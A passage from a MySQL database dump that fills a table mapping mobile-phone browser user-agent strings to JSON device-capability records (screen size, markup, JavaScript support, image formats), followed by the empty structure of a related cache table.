Safari/*','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":228,\"screenHeight\":280,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia7020','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NokiaC1-01','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":128,\"screenHeight\":160,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NokiaC1-01 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":128,\"screenHeight\":160,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NokiaC1-01.1 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":128,\"screenHeight\":160,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaC1-02','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":128,\"screenHeight\":160,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NokiaC2-00 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":128,\"screenHeight\":160,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NokiaC2-01','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaC2-01 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaC2-01 Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaC2-02 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaC2-03 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaC2-05 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaC3-00','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NokiaC3-00 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NokiaC3-00 Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaE65-1 Series60/* Profile/MIDP-2.0 Configuration/CLDC-1.1','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NokiaN70-1 Series60/* Profile/MIDP-2.0 Configuration/CLDC-1.1','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":165,\"screenHeight\":188,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaN73-1 Series60/* Profile/MIDP-2.0 Configuration/CLDC-1.1','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaX2-00','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NokiaX2-00 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NokiaX2-00 Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaX2-01','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaX2-01 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('NokiaX2-02 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NokiaX3-00 Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":228,\"screenHeight\":280,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Opera/8.01 (J2ME/MIDP; Opera Mini; ssr)','opera','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":165,\"screenHeight\":140,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Opera/9.60 (J2ME/MIDP; Opera Mini) Presto/2.2','opera','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":165,\"screenHeight\":140,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Opera/9.80 (Android 2.*; Linux; Opera Mobi) Presto/2.10','opera','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Opera/9.80 (Android 2.*; Linux; Opera Mobi) Presto/2.9','opera','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Opera/9.80 (Android 4.*; Linux; Opera Mobi) Presto/2.11','opera','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Opera/9.80 (Android; Opera Mini) Presto/2.8','opera','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Opera/9.80 (BlackBerry; Opera Mini) Presto/2.8','opera','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Opera/9.80 (J2ME/MIDP; Opera Mini) Presto/2.8','opera','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Opera/9.80 (S60; SymbOS; Opera Mobi) Presto/2.10','opera','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Opera/9.80 (S60; SymbOS; Opera Mobi) Presto/2.5','opera','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":280,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Opera/9.80 (S60; SymbOS; Opera Mobi) Presto/2.9','opera','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Opera/9.80 (Windows Mobile; Opera Mini) Presto/2.8','opera','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Fucus/Unknown;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Gionee_1300GA;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(MAUI_MRE;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 215FW10.01;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 215FW13.01;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 216FW10.01;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 216FW12.00;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 216FW30.01;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 216FW40.00;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 220FW13.00;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 222FW10.00;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 222FW21.00;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 225FW10.01;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 230FW10.01;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 230FW13.00;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 230FW30.01;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 230FW40.00;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(Nokia 3310FW11.02;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('OperaMini(WW_00_176X220_KEY_E;Opera Mini)','opera_mini','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":210,\"screenHeight\":176,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('PhilipsX623 MAUI/10A1032MP_ASTRO_W1052 Release/31.12 Browser/Opera Profile/MIDP-2.0 Configuration/CLDC-1.1 Sync/SyncClient1.1 Opera/9.80 (MTK; Nucleus; Opera Mobi) Presto/2.5','philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('ReksioVRE(196683)','reksio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SAMSUNG-GT-B2710 SHP/VPP/R5 Dolfin/2.0 QTV/5.3 SMM-MMS/1.2 profile/MIDP-2.1 configuration/CLDC-1.1 OPN-B','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":228,\"screenHeight\":280,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-C3010 Openwave/6.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2 (GUI) MMP/2.0','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":120,\"screenHeight\":96,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-C3212 NetFront/3.5 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":120,\"screenHeight\":130,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-C3312 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-C3313T NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-C3322 NetFront/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-C3322i','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SAMSUNG-GT-C3322i NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-C3350 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-C3520 NetFront/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-C3520I','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-C3590','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SAMSUNG-GT-C3592','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SAMSUNG-GT-C3782','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SAMSUNG-GT-C6712 SHP/VPP/R5 Dolfin/2.0 NexPlayer/3.0 SMM-MMS/1.2 profile/MIDP-2.1 configuration/CLDC-1.1 OPN-B','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":400,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-E2121B Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2 (GUI) MMP/2.0','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":120,\"screenHeight\":100,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-E2202','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":128,\"screenHeight\":160,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-E2600 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-E3309 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":128,\"screenHeight\":160,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-S3333','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-S3572','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SAMSUNG-GT-S3800W','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SAMSUNG-GT-S3850 SHP/VPP/R5 Dolfin/2.0 NexPlayer/3.0 SMM-MMS/1.2 profile/MIDP-2.1 configuration/CLDC-1.1 OPN-B','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-S5222','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SAMSUNG-GT-S5222 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-S5230 SHP/VPP/R5 Jasmine/0.8 Nextreaming SMM-MMS/1.2 profile/MIDP-2.1 configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":400,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-S5250','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":400,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SAMSUNG-GT-S5260 SHP/VPP/R5 Dolfin/2.0 NexPlayer/3.0 SMM-MMS/1.2 profile/MIDP-2.1 configuration/CLDC-1.1 OPN-B','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":228,\"screenHeight\":360,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-S5292 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-S5600 SHP/VPP/R5 Jasmine/0.8 Qtv5.3 SMM-MMS/1.2 profile/MIDP-2.1 configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":228,\"screenHeight\":280,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-S5610 NetFront/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-S5610 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SAMSUNG-GT-S5610-ORANGE NetFront/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-GT-S5611','samsung_s_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-SM-B350E','samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SAMSUNG-SM-B360E','samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SAMSUNG-SM-B550H','samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SonyEricssonC702','sonyericsson','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SonyEricssonC702 Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.3','sonyericsson','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":220,\"screenHeight\":300,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SonyEricssonCK13i','sonyericsson','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SonyEricssonK530i Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1','sonyericsson','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":170,\"screenHeight\":200,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SonyEricssonK530i Profile/MIDP-2.0 Configuration/CLDC-1.1','sonyericsson','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":176,\"screenHeight\":220,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SonyEricssonK660i Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1','sonyericsson','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":228,\"screenHeight\":280,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('SonyEricssonT700','sonyericsson','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('SonyEricssonW810i','sonyericsson','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":170,\"screenHeight\":200,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('UNTRUSTED/1.0','','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('ZTE-Z432/1.0 NetFront/4.2 QTV5.1 Profile/MIDP-2.1 Configuration/CLDC-1.1','zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}');
/*!40000 ALTER TABLE `xyhmu_mj_amdd` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_mj_amdd_cache`
--

DROP TABLE IF EXISTS `xyhmu_mj_amdd_cache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_mj_amdd_cache` (
  `ua` varchar(255) COLLATE utf8_bin NOT NULL,
  `data` varchar(255) COLLATE utf8_bin NOT NULL,
  `time` int(10) unsigned NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_mj_amdd_cache`
--

LOCK TABLES `xyhmu_mj_amdd_cache` WRITE;
/*!40000 ALTER TABLE `xyhmu_mj_amdd_cache` DISABLE KEYS */;
